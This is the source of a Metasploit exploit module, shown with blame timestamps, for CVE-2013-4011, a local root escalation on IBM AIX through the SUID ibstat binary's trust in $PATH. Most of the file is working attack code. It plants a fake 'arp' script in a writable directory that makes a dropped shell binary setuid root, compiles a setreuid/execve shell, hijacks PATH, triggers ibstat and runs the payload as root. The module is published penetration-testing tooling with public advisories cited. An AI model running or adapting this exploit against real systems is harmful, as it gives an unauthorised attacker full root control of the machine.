metasploit-framework/modules/exploits/aix/local/ibstat_path.rb

175 lines
4.5 KiB
Ruby
Raw Normal View History

2014-02-28 22:53:24 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
2014-04-03 21:54:33 +00:00
2014-02-28 22:53:24 +00:00
Rank = ExcellentRanking
2014-02-28 22:53:24 +00:00
include Msf::Post::File
include Msf::Exploit::FileDropper
2014-04-03 21:54:33 +00:00
def initialize(info = {})
super(update_info(info,
"Name" => "ibstat $PATH Privilege Escalation",
"Description" => %q{
This module exploits the trusted $PATH environment variable of the SUID binary "ibstat".
},
"Author" => [
"Kristian Erik Hermansen", #original author
"Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>", #Metasploit module
"Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>" #Metasploit module
],
"References" => [
["CVE", "2013-4011"],
["OSVDB", "95420"],
["BID", "61287"],
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827"],
["URL", "http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756"]
],
"Platform" => ["unix"],
"Arch" => ARCH_CMD,
"Payload" => {
"Compat" => {
"PayloadType" => "cmd",
"RequiredCmd" => "perl"
}
},
"Targets" => [
["IBM AIX Version 6.1", {}],
["IBM AIX Version 7.1", {}]
],
"DefaultTarget" => 1,
"DisclosureDate" => "Sep 24 2013"
))
register_options([
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
], self.class)
end
2014-02-28 22:53:24 +00:00
def check
2014-04-03 21:54:33 +00:00
find_output = cmd_exec("find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null")
if find_output.include?("ibstat")
2014-03-31 22:54:51 +00:00
return Exploit::CheckCode::Vulnerable
end
2014-04-03 21:54:33 +00:00
Exploit::CheckCode::Safe
2014-02-28 22:53:24 +00:00
end
2014-02-28 22:53:24 +00:00
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Target is vulnerable.")
end
2014-02-28 22:53:24 +00:00
root_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
arp_file = "#{datastore["WritableDir"]}/arp"
c_file = %Q^#include <stdio.h>
2014-02-28 22:53:24 +00:00
int main()
{
setreuid(0,0);
setregid(0,0);
execve("/bin/sh",NULL,NULL);
2014-02-28 22:53:24 +00:00
return 0;
}
^
arp = %Q^#!/bin/sh
2014-02-28 22:53:24 +00:00
chown root #{root_file}
chmod 4555 #{root_file}
^
2014-02-28 22:53:24 +00:00
if gcc_installed?
print_status("Dropping file #{root_file}.c...")
write_file("#{root_file}.c", c_file)
2014-04-03 21:54:33 +00:00
2014-02-28 22:53:24 +00:00
print_status("Compiling source...")
2014-04-03 21:54:33 +00:00
cmd_exec("gcc -o #{root_file} #{root_file}.c")
2014-02-28 22:53:24 +00:00
print_status("Compilation completed")
2014-04-03 21:54:33 +00:00
register_file_for_cleanup("#{root_file}.c")
2014-02-28 22:53:24 +00:00
else
2014-04-03 21:54:33 +00:00
cmd_exec("cp /bin/sh #{root_file}")
end
2014-04-03 21:54:33 +00:00
register_file_for_cleanup(root_file)
2014-02-28 22:53:24 +00:00
print_status("Writing custom arp file...")
2014-04-03 21:54:33 +00:00
write_file(arp_file,arp)
register_file_for_cleanup(arp_file)
cmd_exec("chmod 0555 #{arp_file}")
2014-02-28 22:53:24 +00:00
print_status("Custom arp file written")
2014-04-03 21:54:33 +00:00
print_status("Updating $PATH environment variable...")
2014-04-03 21:54:33 +00:00
path_env = cmd_exec("echo $PATH")
cmd_exec("PATH=#{datastore["WritableDir"]}:$PATH")
cmd_exec("export PATH")
print_status("Finding interface name...")
iface = ""
cmd_exec("lsdev -Cc if").each_line do |line|
if line.match(/^[a-z]+[0-9]+\s+Available/) and not line.match(/^lo[0-9]/)
iface = line.split(/\s+/)[0]
print_status("Found interface #{iface}.")
break
end
end
if iface == ""
iface = "en0"
print_status("Found no interface, defaulting to en0.")
end
2014-02-28 22:53:24 +00:00
print_status("Triggering vulnerablity...")
cmd_exec("/usr/bin/ibstat -a -i #{iface} 2>/dev/null >/dev/null")
2014-04-03 21:54:33 +00:00
# The $PATH variable must be restored before the payload is executed
# in cases where an euid root shell was gained
2014-04-03 21:54:33 +00:00
print_status("Restoring $PATH environment variable...")
cmd_exec("PATH=#{path_env}")
cmd_exec("export PATH")
cmd_exec(root_file)
2014-02-28 22:53:24 +00:00
print_status("Checking root privileges...")
2014-04-03 21:54:33 +00:00
if is_root?
print_status("Executing payload...")
2014-04-03 21:54:33 +00:00
cmd_exec(payload.encoded)
end
2014-02-28 22:53:24 +00:00
end
2014-02-28 22:53:24 +00:00
def gcc_installed?
print_status("Checking if gcc exists...")
2014-04-03 21:54:33 +00:00
gcc_whereis_output = cmd_exec("whereis -b gcc")
if gcc_whereis_output.include?("/")
2014-03-31 22:54:51 +00:00
print_good("gcc found!")
return true
end
2014-04-03 21:54:33 +00:00
print_status("gcc not found. Using /bin/sh from local system")
false
2014-02-28 22:53:24 +00:00
end
2014-02-28 22:53:24 +00:00
def is_root?
2014-04-03 21:54:33 +00:00
id_output = cmd_exec("id")
if id_output.include?("euid=0(root)")
2014-02-28 22:53:24 +00:00
print_good("Got root! (euid)")
return true
end
2014-04-03 21:54:33 +00:00
if id_output.include?("uid=0(root)")
2014-02-28 22:53:24 +00:00
print_good("Got root!")
return true
2014-02-28 22:53:24 +00:00
end
2014-04-03 21:54:33 +00:00
print_status("Exploit failed")
false
2014-02-28 22:53:24 +00:00
end
2014-04-03 21:54:33 +00:00
end